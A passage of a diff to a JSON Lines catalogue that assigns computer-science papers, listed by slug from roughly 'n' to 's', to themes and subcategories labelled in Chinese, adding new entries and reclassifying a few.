系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"nfs-1985","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"ngabonziza-trustzone-2016","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"nickolls-dally-2010-cuda-era","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} @@ -607,6 +816,9 @@ {"slug":"nimier-david-2019-mitsuba2","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"nix","area":"papers","theme":"CLI","themeId":"cli","subcategory":"包管理 / 系统","source":"category","confidence":"high","rawCategory":"CLI"} {"slug":"no-silver-bullet","area":"papers","theme":"其他","themeId":"other","subcategory":"软件工程","source":"category","confidence":"high","rawCategory":"其他"} +{"slug":"noise-explorer-2018","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"noise-protocol-framework","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"nova-folding-2021","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"密码与零知识","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"ntk-2018","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"ntp-mills-1991","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"nuprl-1986","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} @@ -615,29 +827,44 @@ {"slug":"nvm","area":"papers","theme":"后端 API","themeId":"backend-api","subcategory":"前端工具链","source":"category","confidence":"high","rawCategory":"后端 API"} {"slug":"nvme-protocol-2017","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"oauth-2.1-rfc","area":"papers","theme":"后端 API","themeId":"backend-api","subcategory":"后端","source":"category","confidence":"high","rawCategory":"后端 API"} +{"slug":"oauth2-rfc6749","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"octo-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"机器人与 VLA","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"okapi-bm25-1994","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} +{"slug":"oltp-looking-glass","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"omagent-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"omega-2013","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"omnidirectional-mllm-2025","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"omnistvg-2025","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"on-demand-container-loading","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} +{"slug":"op-tee-tee-2014","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式与 IoT","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"openai-sora-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"opencl-2010","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"openflow-2008","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"openhands","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"智能体与 LLM","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"opensearch","area":"papers","theme":"基础设施","themeId":"infrastructure","subcategory":"基础设施","source":"category","confidence":"high","rawCategory":"基础设施"} +{"slug":"openvla-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"机器人与 VLA","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"operational-transform-jupiter-1995","area":"papers","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} {"slug":"optuna","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"机器学习 / 超参优化","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"orca-2022","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"orca-continuous-batching","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"oscar-int2-kv","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"ot-1989","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"owens-2007-gpgpu-survey","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} -{"slug":"p4-2014","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} +{"slug":"p4-2014","area":"papers","theme":"基础设施","themeId":"infrastructure","subcategory":"系统综合","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} +{"slug":"pacing-types-for-asynchronous-stream-equations-arxiv-2605-26635","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"padmanabhan-1995-http-latency","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} +{"slug":"paged-attention-vllm","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"pagerank-1998","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"pair-programming","area":"papers","theme":"其他","themeId":"other","subcategory":"软件工程","source":"category","confidence":"high","rawCategory":"其他"} {"slug":"panel","area":"papers","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"category","confidence":"high","rawCategory":"数据可视化"} +{"slug":"paracell-paravirtualized-secure-containers-arxiv-2605-20906","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"park-2019-deepsdf","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"parnas-information-hiding-1972","area":"papers","theme":"其他","themeId":"other","subcategory":"工程文化","source":"candidates.topic","confidence":"high","rawCategory":"其他"} {"slug":"parti-2022","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"partial-evaluation-jones","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"pascal-architecture-2016","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"passnet-graph-compiler","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"passnet-scaling-large-language-models-for-graph-compiler-pass-generation-arxiv-2","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"pastry-2001","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"paxos-1998","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"paxos-simple-2001","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} @@ -645,48 +872,66 @@ {"slug":"pbft-1999","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"peg-packrat-ford","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"percolator-2010","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} -{"slug":"performer-2020","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"performer-2020","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ml","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"perlin-1985-noise","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"persistent-memory-2014","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"personalized-pagerank-2003","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"peyton-jones-stg","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"phong-1975","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"photon-databricks-2022","area":"papers","theme":"数据库","themeId":"databases","subcategory":"现代数据库","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} +{"slug":"pi0-physical-intelligence-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"机器人与 VLA","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"piotrowska-loopix-2017","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"pipedream-2019","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"pivot-tracing-2015","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"plan9-1995","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"plenoxels-2022","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"plookup-2020","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"密码与零知识","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"plotkin-sos","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"pnueli-temporal-1977","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"pnuts-2008","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"polar-codes-2009","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"信息论","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"pottier-merr","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"ppc-preplan","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"ppo","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"强化学习","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"prefix-cache-policy-2026","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"presumed-abort-1986","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} +{"slug":"priority-inversion-mars-pathfinder","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式与 IoT","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"product-quantization-2011","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"program-comprehension-fmri","area":"papers","theme":"其他","themeId":"other","subcategory":"软件工程认知科学","source":"category","confidence":"high","rawCategory":"其他"} {"slug":"programmer-interruption","area":"papers","theme":"其他","themeId":"other","subcategory":"软件工程","source":"category","confidence":"high","rawCategory":"其他"} +{"slug":"projection-bench","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"projectional-decoding-semantic-aware-llm-generation-arxiv-2605-30054","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"prolog-colmerauer","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"prosemirror-architecture","area":"papers","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} {"slug":"prototypical-networks-2017","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"proverif-2001","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"ps-li-2014","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"push-pull-frp","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"编程语言","source":"category","confidence":"high","rawCategory":"编程语言"} {"slug":"pypy-tracing-jit","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"qserve-w4a8kv4-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"quantum-supremacy-2019","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"quic","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"计算机网络","source":"category","confidence":"high","rawCategory":"网络协议"} {"slug":"quincy-2009","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"qvhighlights-2021","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"qwen-vla","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"qwen2-5-vl-2025","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"qwen2-vl-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"r-bgp-2007","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"rabin-ot-1981","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"racket-2018-tour","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"racket-macros-flatt-2016","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"raft","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"分布式系统","source":"category","confidence":"high","rawCategory":"分布式系统"} {"slug":"rag-lewis-2020","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"AI / NLP","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"ragtruth","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"RAG","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"ranknet-2005","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} +{"slug":"rate-monotonic-1973","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式与 IoT","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"ray-2018","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"rcu-2001","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"rcu-mckenney-2017","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"react-server-components","area":"papers","theme":"后端 API","themeId":"backend-api","subcategory":"前端框架","source":"category","confidence":"high","rawCategory":"后端 API"} {"slug":"react","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"智能体与 LLM","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"realm","area":"papers","theme":"NLP","themeId":"nlp","subcategory":"自然语言处理","source":"category","confidence":"high","rawCategory":"NLP"} +{"slug":"reasoning-with-sampling","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"red-1993","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"reed-onion-routing-1998","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"reed-solomon-1960","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"信息论","source":"category","confidence":"high","rawCategory":"机器学习"} @@ -694,49 +939,76 @@ {"slug":"reflexion","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"智能体与 LLM","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"reformer-2020","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"regev-lwe-2005","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"rendering-diffs","area":"papers","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} {"slug":"replug-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"reps-ifds","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"resnet","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"计算机视觉 / 深度学习","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"resolution-diagnostics-llm","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"rest-fielding-2000","area":"papers","theme":"后端 API","themeId":"backend-api","subcategory":"后端","source":"category","confidence":"high","rawCategory":"后端 API"} {"slug":"retro","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"AI / NLP","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"reynolds-definitional-interpreters","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"reynolds-separation-logic","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"rfc-3833-dns-threats","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} +{"slug":"rim-latent-reasoning","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"ring-allreduce-2017","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"risc-i-1981","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"rlhf-christiano","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"强化学习 / AI 安全","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"rm3-2001","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"roberta-2019","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"robust-u1","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"多模态","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"rocketqa-2021","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"rocksdb-2017","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} +{"slug":"rocksdb-evolution-2021","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"rocksdb-lsm","area":"papers","theme":"数据库","themeId":"databases","subcategory":"数据库","source":"category","confidence":"high","rawCategory":"数据库"} {"slug":"ron-2001","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} +{"slug":"rosettafold-2021","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"生物信息","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"row-polymorphism-remy","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"rowhammer-2014","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"rrf-cormack-2009","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"数据检索","source":"category","confidence":"high","rawCategory":"信息检索"} +{"slug":"rsa-1978","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"rsa","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"密码学","source":"category","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"rt-1-2022","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"机器人与 VLA","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"rt-2-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"机器人与 VLA","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"rt-x-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"机器人与 VLA","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"rtp-llm-alibaba","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} +{"slug":"rtp-llm-high-performance-alibaba-llm-inference-engine-arxiv-2605-29639","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"rtp-rfc-1889","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} -{"slug":"rwkv-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"rust-analyzer-architecture","area":"papers","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} +{"slug":"rustbelt-2018","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"rwkv-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ml","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"sac-2018","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"saga-1987","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"sagiv-shape-analysis","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"saito-takahashi-1990-gbuffer","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"salsa-adapton","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"编程语言","source":"category","confidence":"high","rawCategory":"编程语言"} +{"slug":"salsa-incremental-2019","area":"papers","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} +{"slug":"salsa-incremental-rust-analyzer","area":"papers","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} {"slug":"salsify-2018","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"salton-vsm-1975","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"saltzer-1984-e2e","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"saltzer-schroeder-1975","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"sam","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"计算机视觉","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"same-evidence-different-answers-canonical-context-on-policy-distillation-arxiv-2","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} 